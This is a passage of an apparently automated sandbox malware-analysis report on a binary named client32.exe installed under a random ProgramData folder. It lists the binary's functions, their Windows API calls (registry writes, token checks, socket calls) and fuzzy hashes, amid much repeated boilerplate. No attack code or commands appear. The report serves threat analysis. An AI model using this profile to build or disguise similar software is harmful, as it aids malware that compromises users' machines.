                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                • String ID: *AutoICFConfig$Client
                                                                                                • API String ID: 3257255551-59951473
                                                                                                • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                                • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                                                • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                                • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                                                Function 11070F90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveSleep
                                                                                                • String ID: Push
                                                                                                • API String ID: 1566154052-4278761818
                                                                                                • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                                • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                                                • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                                • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                                                Function 69CEA4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,00000000,?,?,?,69CEDA7F,?,00000000), ref: 69CEA503
                                                                                                • InterlockedExchange.KERNEL32(?,00000000,?,69CEDA7F,?,00000000), ref: 69CEA568
                                                                                                • Sleep.KERNEL32(00000000,?,69CEDA7F,?,00000000), ref: 69CEA581
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,00000000), ref: 69CEA5B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4212191310-0
                                                                                                • Opcode ID: 0e63a2a6d295b7b12c6ec2cb22a0b468cca5082b75fdd261d4093cb703b97759
                                                                                                • Instruction ID: e942bb29363920f6bd11df7cb7c4b88bceeba7e8ef2a6a4becbf4a2e79b59fdf
                                                                                                • Opcode Fuzzy Hash: 0e63a2a6d295b7b12c6ec2cb22a0b468cca5082b75fdd261d4093cb703b97759
                                                                                                • Instruction Fuzzy Hash: 6B2129B6905A409FFF218F18E94179AB7B8FFC6324F019476DA5793640E375A8408BA1
                                                                                                Function 11110430 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InitializeCriticalSection.KERNEL32(hKB,986DAFD2,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                                                • EnterCriticalSection.KERNEL32(hKB,986DAFD2,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                                                • LeaveCriticalSection.KERNEL32(hKB,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                                • String ID: hKB
                                                                                                • API String ID: 3991485460-853210616
                                                                                                • Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                                • Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
                                                                                                • Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                                • Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0
                                                                                                Function 00A11020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCommandLineA.KERNEL32 ref: 00A11027
                                                                                                • GetStartupInfoA.KERNEL32 ref: 00A1107B
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00A11096
                                                                                                • ExitProcess.KERNEL32 ref: 00A110A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644020864.0000000000A11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A10000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644017470.0000000000A10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_a10000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                • String ID:
                                                                                                • API String ID: 2164999147-0
                                                                                                • Opcode ID: e46c214cde09dd5444cf7e0eedbbc013f33f3d603533ba2aa13157169ecf4803
                                                                                                • Instruction ID: aa12449bd66064902ece0a13a9fd2a1917929b485c997196f6642478d0dbc99a
                                                                                                • Opcode Fuzzy Hash: e46c214cde09dd5444cf7e0eedbbc013f33f3d603533ba2aa13157169ecf4803
                                                                                                • Instruction Fuzzy Hash: A011C028C083D45AEB71DFA089487EABFA69F0E385F244048EED696146D2568CC7C7A5
                                                                                                Function 11030DA7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                                • String ID:
                                                                                                • API String ID: 1314093303-0
                                                                                                • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                                • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                                                • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                                • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                                                Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\i99ekubc\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentFileModuleNameProcess
                                                                                                • String ID: C:\ProgramData\i99ekubc\client32.exe
                                                                                                • API String ID: 2251294070-2387543234
                                                                                                • Opcode ID: 51ce01c9fcdc8ff389fc3397649c7f4af1219c34e1d2cf3611634df6c680d855
                                                                                                • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                                • Opcode Fuzzy Hash: 51ce01c9fcdc8ff389fc3397649c7f4af1219c34e1d2cf3611634df6c680d855
                                                                                                • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                                Function 69CF7AE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: hbuf->data$httputil.c
                                                                                                • API String ID: 4104443479-2732665889
                                                                                                • Opcode ID: 587cd8bd5ebf161ca03c78f361bc901a25cc775fb10c18548e2b20ff43d3d43c
                                                                                                • Instruction ID: 197aad5d7efc554fe762f7bcf51bc646ca8b42790fc1418b3187c6efc37485d3
                                                                                                • Opcode Fuzzy Hash: 587cd8bd5ebf161ca03c78f361bc901a25cc775fb10c18548e2b20ff43d3d43c
                                                                                                • Instruction Fuzzy Hash: 2E0186BA6002015FD710CF59EC80D5AB3A9EF85368B14C539FA49C7649E631E84587A0
                                                                                                Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _calloc
                                                                                                • String ID:
                                                                                                • API String ID: 1679841372-0
                                                                                                • Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                                • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                                                • Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                                • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                                                Function 11116E30 Relevance: 4.6, APIs: 3, Instructions: 69registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 11116E81
                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 11116EBE
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 11116EC5
                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseValue$Query
                                                                                                • String ID:
                                                                                                • API String ID: 392431914-0
                                                                                                • Opcode ID: 0c17dcaf32e79eefaf6146fad22fdca5df33e64ba1c4a8018afc1abead3a4a81
                                                                                                • Instruction ID: edf5b6ff414cef76fc351fb673ec4a61117703520949674c054a66456527b656
                                                                                                • Opcode Fuzzy Hash: 0c17dcaf32e79eefaf6146fad22fdca5df33e64ba1c4a8018afc1abead3a4a81
                                                                                                • Instruction Fuzzy Hash: 2E11DD76201128BBE700CE58DC48FEBB76C9F84B29F048228FE198A189D371A605C7B0
                                                                                                Function 69CE8FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CE8FE4
                                                                                                • getsockname.WSOCK32(?,?,00000010), ref: 69CE9005
                                                                                                • WSAGetLastError.WSOCK32(?,?,00000010,?,02EF2F78,?), ref: 69CE902E
                                                                                                  • Part of subcall function 69CE5840: inet_ntoa.WSOCK32(69D2B8DA), ref: 69CE5852
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                • String ID:
                                                                                                • API String ID: 3066294524-0
                                                                                                • Opcode ID: bf15f89d3b7738e1eb60fb48b8216a24bbdc1073993107b162004e202f7a2e31
                                                                                                • Instruction ID: 30e37e2bd57672124741be1f1e07660682665e7be636590e31269a8f01a0498f
                                                                                                • Opcode Fuzzy Hash: bf15f89d3b7738e1eb60fb48b8216a24bbdc1073993107b162004e202f7a2e31
                                                                                                • Instruction Fuzzy Hash: 7E113375D00118AFDB10DFA9DC51ABFB7B8EF49314F40856AED05E7240E7705E158BA1
                                                                                                Function 11112140 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104,?), ref: 1111216A
                                                                                                • __wsplitpath.LIBCMT ref: 11112185
                                                                                                  • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                                                • GetVolumeInformationA.KERNEL32 ref: 111121B9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                • String ID:
                                                                                                • API String ID: 1847508633-0
                                                                                                • Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                                • Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
                                                                                                • Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                                • Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
                                                                                                Function 1109EE00 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                                  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                                  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                                  • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                                  • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,0041D3B8,?,00000001,00000001), ref: 1109EDC3
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1109EE47
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
